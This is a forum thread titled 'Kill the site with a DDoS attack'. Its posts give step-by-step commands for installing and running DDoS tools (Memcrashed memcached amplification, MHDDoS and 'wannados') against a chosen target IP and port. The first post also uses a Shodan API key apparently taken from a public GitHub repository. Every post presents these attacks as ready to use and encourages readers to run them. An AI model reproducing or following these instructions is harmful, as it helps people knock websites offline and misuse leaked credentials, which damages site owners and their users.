Kill the site with a DDoS attack

Lord777

Professional
Messages
2,581
Reputation
15
Reaction score
1,322
Points
113
Have you heard of the controversial attack on Github? Memcrashed servers were used to strengthen it. We will teach you how to work with this software!

Many of you have probably heard about the sensational attack on Github. Memcrashed servers were used to amplify it and, as a result, the capacity was about 1.35TB / s. Not so weak, right?

Today we are going to look at a tool that allows us to repeat an attack like this. For this, there is a special tool on github called Memcrashed.

1fa2f90013cb3dc807b45.png


We will work in Kali Linux

We start, open the terminal and for the first, as always, enter:

Code:
apt update
apt upgrade

Install Python if you haven't already:
Code:
apt-get install python3
apt-get install python3-pip

Then we will install two more necessary components.
Code:
pip install scapy
pip install shodan

Downloading the program files from Github
Code:
git clone https://github.com/zadachnik/memcrashed-ddos.git

Go to the folder
Code:
cd memcrashed-ddos

Then
Code:
pip install -r requirements.txt

Note:
If you get an error when installing some components, you can try writing the command like this:

Code:
pip3 install ...

We continue
To carry out an attack, we need a special API Key. It can be searched using Google or on the same Github. We enter something like "api key", "api key shodan", etc.

For example, I'll take the one presented on github

Let's create an api.txt file with our key:

Code:
echo "PSKINdQe1GyxGgecYz2191H2JoS9qvgD"> api.txt

Again, you can use your API Key.

Launch
Code:
python3 Memcrashed.py

The rest is simple.

e42cf4f040c45bf2ef8c0.png


You will be asked if you have local bots (Shodan saved search) or api key search on Shodan. Here we choose the second option.

b756976ed259d62f90241.png

Whether to save the result for the next time is up to you.

Next, you will be asked to enter:
  • IP targets
  • Which port to attack (here you need an open port on the target). Attack power (Enter preferred power (Default 1):)
  • Enter payload contained inside packet - write, for example, 2 or 100

1752686fb537866ef84a3.png

Done!​

 

CreedX

Unknown
Messages
233
Reputation
4
Reaction score
226
Points
43
github

Clone and Install Script

Bash:
git clone https://github.com/MHProDev/MHDDoS.git
cd MHDDoS
pip3 install -r requirements.txt

Launch Script
Bash:
python3 start.py
python3 start.py bypass https://example.com 5 1000 socks5.txt 100 100
 

Father

Professional
Messages
2,601
Reputation
4
Reaction score
633
Points
113
Most powerful DDoS!

WANNADOS
(https://github.com/vebix/wannados) is probably the best and strongest DDoS attack tool I have used. If you run on VDS, the number of requests reaches 700k!

Installation (Termux / Linux):
Code:
In the meantime, there is no need to know about it. ”◾️apt update && apt upgrade
◾️apt install python
◾️pip install colorama
◾️git clone https://github.com/vebix/wannados
◾️cd wannados

Installation (Windows):
1. Download the archive from here (https://github.com/vebix/wannados).
2. Install Python 3.9+

Using
Code:
◾️python main.py

⚡️ After starting, enter IP / Domain + Port and enjoy the result!
 
Top